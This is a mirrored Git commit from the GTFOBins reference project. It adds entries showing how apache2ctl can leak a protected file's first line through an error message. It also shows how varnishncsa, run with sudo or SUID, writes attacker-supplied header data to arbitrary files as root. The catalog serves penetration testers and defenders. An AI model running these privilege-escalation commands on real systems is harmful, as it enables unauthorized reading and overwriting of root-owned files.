mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add varnishncsa and apache2ctl
This commit is contained in:
commit
e986b31e59
12
_gtfobins/apache2ctl.md
Normal file
12
_gtfobins/apache2ctl.md
Normal file
@ -0,0 +1,12 @@
|
||||
---
|
||||
description: This includes the file in the actual configuration file, the first line is leaked as an error message.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
apache2ctl -c "Include $LFILE" -k stop
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo apache2ctl -c "Include $LFILE" -k stop
|
||||
---
|
17
_gtfobins/varnishncsa.md
Normal file
17
_gtfobins/varnishncsa.md
Normal file
@ -0,0 +1,17 @@
|
||||
---
|
||||
description: |
|
||||
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
|
||||
|
||||
```
|
||||
curl -H 'yyy: DATA' http://localhost:6081/xxx
|
||||
```
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
|
||||
---
|
Loading…
Reference in New Issue
Block a user